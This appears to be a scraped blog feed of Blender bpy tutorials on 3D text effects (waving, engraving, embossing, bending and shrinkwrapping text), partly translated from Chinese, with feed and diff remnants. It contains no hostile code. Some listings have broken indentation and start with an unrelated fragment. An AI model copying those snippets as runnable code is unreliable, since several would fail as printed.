realize_instances_node.location = (1050, 50)

# Create the Merge by Distance node
merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
merge_by_distance_node.location = (1250, 50)

# Get the Group Output node
output_node = node_tree.nodes.get("Group Output")
output_node.location = (1450, 50)

# Create the String nodes
string_nodes = []
for i in range(3):
    string_nodes.append(node_tree.nodes.new(type='FunctionNodeInputString'))
    string_nodes[-1].location = (-800, -150 * i + 50)
string_nodes[0].string = 'Taco'
string_nodes[1].string = 'Tuesday!'
string_nodes[2].string = 'gigigigigi~'

# Create the Join Strings node
join_strings_node = node_tree.nodes.new(type='GeometryNodeStringJoin')
join_strings_node.location = (-600, 75)

# Create the Set Position nodes
set_position_nodes = []
for i in range(2):
    set_position_nodes.append(node_tree.nodes.new(type='GeometryNodeSetPosition'))
    set_position_nodes[-1].location = (-150, -250 * i + 200)
set_position_nodes[0].inputs[3].default_value[1] = 2
set_position_nodes[1].inputs[3].default_value[1] = -1

# Wire up the nodes
node_tree.links.new(special_characters_node.outputs[0], join_strings_node.inputs[0])
node_tree.links.new(string_nodes[1].outputs[0], join_strings_node.inputs[1])
node_tree.links.new(string_nodes[0].outputs[0], join_strings_node.inputs[1])
node_tree.links.new(string_nodes[2].outputs[0], string_to_curves_nodes[1].inputs[0])
node_tree.links.new(join_strings_node.outputs[0], string_to_curves_nodes[0].inputs[0])
node_tree.links.new(string_to_curves_nodes[0].outputs[0], set_position_nodes[0].inputs[0])
node_tree.links.new(string_to_curves_nodes[1].outputs[0], set_position_nodes[1].inputs[0])
node_tree.links.new(set_position_nodes[0].outputs[0], join_geometry_nodes[0].inputs[0])
node_tree.links.new(set_position_nodes[1].outputs[0], join_geometry_nodes[0].inputs[0])
node_tree.links.new(join_geometry_nodes[0].outputs[0], resample_curve_node.inputs[0])
node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_nodes[1].inputs[0])
node_tree.links.new(flip_faces_node.outputs[0], join_geometry_nodes[1].inputs[0])
node_tree.links.new(join_geometry_nodes[1].outputs[0], realize_instances_node.inputs[0])
node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

# Create the Bevel modifier

text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
text_modifier_bevel.width = 0.05
text_modifier_bevel.segments = 5
text_modifier_bevel.use_clamp_overlap = False
text_modifier_bevel.harden_normals = True

# Create the SimpleDeform modifier to bend the text

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Z"

    Create Wavy or Curvy Text In Blender | Easy Tutorial On Wave Modifier | Dancing Text | Waving Text

1. Create a new Text object and adjust its text, Bevel and Alignment:

    png

    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
2. Give it a Wave modifier and tune its parameters to get a waving animation:

    png

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

Full code:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
3. To stand the text upright, first convert it to a Mesh:

    png

bpy.ops.object.convert(target="MESH")
4. Remove the redundant edges: Mesh ‣ Merge ‣ By Distance:

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
5. Adjust its Rotation, then Object ‣ Apply ‣ All Transforms:

    png

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
6. Add the Wave modifier:

    png

text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
text_modifier.height = 0.75
text_modifier.width = 5
text_modifier.narrowness = 1
text_modifier.start_position_x = 6
text_modifier.speed = 0.2

Full code:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    Easy Method to Engrave Your Text or Logo | How To Carve Any Text | 3D Text Effects In Blender

1. Create a new Text object and set its content, Alignment and Location:

    png

    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    text_obj.data.extrude = 0.3
2. Convert it to a MESH:

    png

    bpy.ops.object.convert(target="MESH")
3. Press X and choose Limited Dissolve from the delete menu:

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

4. Mesh ‣ Merge ‣ By Distance:

    png

    png

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.object.editmode_toggle()
5. Press E and drag upward to Extrude:

    png

    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()
6. Create a new Cube and set its Scale:

    png

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]
7. Add a Boolean modifier:

    png

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()
8. Set up the material and apply the Boolean:

    png

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)
9. Apply the Scale:

    png

    bpy.ops.object.transform_apply()
10. Add a Bevel modifier and set its parameters:

    png

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
11. Export as .glb, which 3D Viewer can open.

    png

bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(
    os.path.abspath(os.path.dirname(bpy.data.filepath)), './outputs/1')))

Full code:

    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    # text_obj.data.extrude = 0.3

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(
    os.path.abspath(os.path.dirname(bpy.data.filepath)), './outputs/1')))

    Easy Method to Emboss Your Text or Logo | How To Create Raised Letters | 3D Text Effects In Blender

Hmm, it's basically the previous recipe with the Boolean operation changed from DIFFERENCE to UNION. If the mesh breaks anywhere, you have to repair it yourself:

    png
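In bpy terms, that single change is just (a sketch, reusing cube_modifier_boolean from the previous script):

cube_modifier_boolean.operation = "UNION"  # the modifier's default operation is "DIFFERENCE"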

    ]]>
@@ -6153,7 +6153,7 @@ /posts/Blender-Text%20Effects%20In%20Blender%20(1-6)/ - Resources

Course

Installing bpy on Linux

Download the prebuilt wheel from Releases · TylerGubala/blenderpy (github.com), then:

    pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install
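To verify the install (a quick sanity check, not from the original post):

import bpy
print(bpy.app.version_string)  # should report the bundled Blender version, e.g. 2.91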

    Create Curved Text In Blender | Bend Any Text | Part 1 in Text Effects | Two Easy Methods Explained

Creating the text object

1. Create a Text object:

    png

    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object
2. Set the Text object's Rotation X and Z to 90°:

    png

    import numpy as np

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
3. Center-align the text:

    png

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
4. Set the Text's Geometry ‣ Extrude to 0.1 m so it has thickness.

    png

    text_obj.data.extrude = 0.1
5. Switch to Edit Mode to change the text content.

    png

    text_obj.data.body = "Hello,\nWorld!"

Bending directly

1. Add a Simple Deform modifier to the Text object:

    png

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")
2. Set its properties:

    png

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

This yields the bent text:

    png


Full code:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

Bending along a Bezier curve

1. Create a new Bezier Circle object and set its Rotation Z to 90°:

    png

    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    curve_obj.rotation_euler[2] = np.pi / 2
2. Add a Curve modifier to the Text object and pick the newly created BezierCircle object:

    png

    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

Now the Text object deforms along the BezierCircle curve:

    png

3. Select the BezierCircle object, switch to Edit Mode, and choose Segments ‣ Switch Direction to flip the text direction:

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()
4. Change the BezierCircle's Scale and the Text object follows:

    png

    curve_obj.delta_scale[0:3] = [2, 2, 2]

Full code:

import bpy
import numpy as np

# Create a new text object
bpy.ops.object.text_add()
text_obj = bpy.context.object

# Set the text rotation
text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2

# Center-align the text
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

# Extrude the text
text_obj.data.extrude = 0.1

# Set the text content
text_obj.data.body = "Hello,\nWorld!"

# Create a Bezier circle
bpy.ops.curve.primitive_bezier_circle_add()
curve_obj = bpy.context.object

# Rotate the circle
curve_obj.rotation_euler[2] = np.pi / 2

# Deform the text along the circle
curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
curve_modifier.object = curve_obj

# Switch the curve direction
bpy.ops.object.editmode_toggle()
bpy.ops.curve.switch_direction()
bpy.ops.object.editmode_toggle()

# Scale up the circle
curve_obj.delta_scale[0:3] = [2, 2, 2]

    Add Text To Any Curved Surface In Blender | Part 2 in Text Effects | Blender Eevee & Cycles

1. Create a teapot:

import bpy
import numpy as np

# primitive_teapot_add is provided by the "Add Mesh: Extra Objects" add-on
# (it is not in vanilla Blender), so that add-on must be enabled first
bpy.ops.mesh.primitive_teapot_add()
teapot_obj = bpy.context.object
2. Create a text object and set its alignment, location (so it sits near the teapot surface), rotation, extrusion, text content, line spacing and so on:

    png

    png

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    text_obj.rotation_euler[0] = np.pi / 2

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.space_line = 0.75
3. Give the text object a red material; switching to the rendered viewport now shows the text in red:

    png

    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    text_obj.data.materials.append(text_material)
4. Create an Empty (Cube), place it at the same location as the Text and set its rotation angles; it is used to drive the Text's bending:

    png

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2
5. Add modifiers to the Text object:
• Remesh: makes the text geometry compatible with the bending operation; choose Sharp and set Octree Depth to 8:

    png

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
• SimpleDeform: bends the text; choose Bend, set Origin to the Empty object and Axis to Y:

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"
• Shrinkwrap: projects the text onto the teapot; set Wrap Method to Target Normal Project, Target to the Teapot object and Offset to 0.1 m:

    png

    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    png


Full code:

import bpy
import numpy as np

# Create the teapot (primitive_teapot_add comes from the "Add Mesh: Extra Objects" add-on)
bpy.ops.mesh.primitive_teapot_add()
teapot_obj = bpy.context.object

# Create the text object
bpy.ops.object.text_add()
text_obj = bpy.context.object

# Center-align the text
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

# Set the location
text_obj.location[1] = -2
text_obj.location[2] = 1.5

# Set the rotation
text_obj.rotation_euler[0] = np.pi / 2

# Set the extrude depth
text_obj.data.extrude = 0.1

# Set the text content
text_obj.data.body = "Hello,\nWorld!"

# Set the line spacing
text_obj.data.space_line = 0.75

# Create the material
text_material = bpy.data.materials.new(name="TextMaterial")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

# Assign the material to the text
text_obj.data.materials.append(text_material)

# Create the empty
bpy.ops.object.empty_add(type="CUBE")
empty_obj = bpy.context.object

# Set the empty's location
empty_obj.location[1] = -2
empty_obj.location[2] = 1.5

# Set the empty's rotation
empty_obj.rotation_euler[0] = np.pi / 2
empty_obj.rotation_euler[2] = np.pi / 2

# Add the Remesh modifier
text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
text_modifier_remesh.mode = "SHARP"
text_modifier_remesh.octree_depth = 8
text_modifier_remesh.use_remove_disconnected = False

# Add the SimpleDeform modifier
text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.origin = empty_obj
text_modifier_simple_deform.deform_axis = "Y"

# Add the Shrinkwrap modifier
text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
text_modifier_shrink_wrap.target = teapot_obj
text_modifier_shrink_wrap.offset = 0.1

    Engrave & Emboss Text Easily In Blender | Part 3 in Text Effects | Create 3D Text Logo In Blender

1. Create a Cube and adjust its Scale:

    png

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5
2. Create a Text object and adjust its Transform:

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

Center-align it:

    png

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

Set the text content:

    png

    text_obj.data.body = "Hello,\nWorld!"
3. Once the text content is final, convert it to a Mesh; after that the text can no longer be edited!

    png

    bpy.ops.object.convert(target="MESH")
4. Apply a Decimate modifier to reduce the excess vertices:

    png

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
5. In Edit Mode, select all vertices of the Text object, then Mesh ‣ Merge ‣ By Distance:

    png

Enter 0.01 m in the dialog.

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. MeshDeleteLimited Dissolve

    png

    在对话框中选择 Max Angle10°

    png

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()
    1. Text 添加一个 Solidfy,使其具有高度:

    png

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    1. Object Mode 下,给 TextCude 使用 Shade Smooth

    png

    png

    png

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True
    1. Cude 添加 Boolean,关闭 Text 的显示,形成雕刻效果:

    png

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    1. Cude 添加 Bevel,形成斜角效果:

    png

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True
    1. Boolean 改为 Union,形成浮雕效果:

    png

    cube_modifier_boolean.operation = "UNION"

    emmmm 如果破了的话好像只能手动处理了。

    png


    完整代码:

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    cube_modifier_boolean.operation = "UNION"

    Engrave or Carve Text On Curved Surface | Part 4 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体:

    png

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    png

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    png

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    png

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个文本对象:

    png

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"
    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    png

    bpy.ops.object.convert(target="MESH")

    png

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    png

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    png

    png

    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    png

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    png

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    png

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    完整代码:

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"

    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2


    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    Emboss Any Text On Curved Surface | Bend Any Text | Part 5 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体。

    png

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object
    1. 添加 Edgesplit,并应用,分离边:

    png

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")
    1. 添加 Subdivision,并应用,使得物体更平滑:

    png

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个 Text,调整其参数:

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    text_obj.data.body = "Hello,\nWorld!"

    png

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    text_obj.data.size = 0.5
    1. 添加一个 Solidify 修改器,挤出 0.15 m:

    png

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15
    1. Text 转成 Mesh

    png

    bpy.ops.object.convert(target="MESH")
    1. Remesh 处理:

    png

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    1. Decimate处理以减少边的数量:

    png

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. 平滑处理:

    png

    png

    png

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True
    1. 新建一个 Empty,位置和 Text 相同,用于文本弯曲:

    png

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2
    1. 设置 SimpleDeform,使 Text 弯曲:

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"
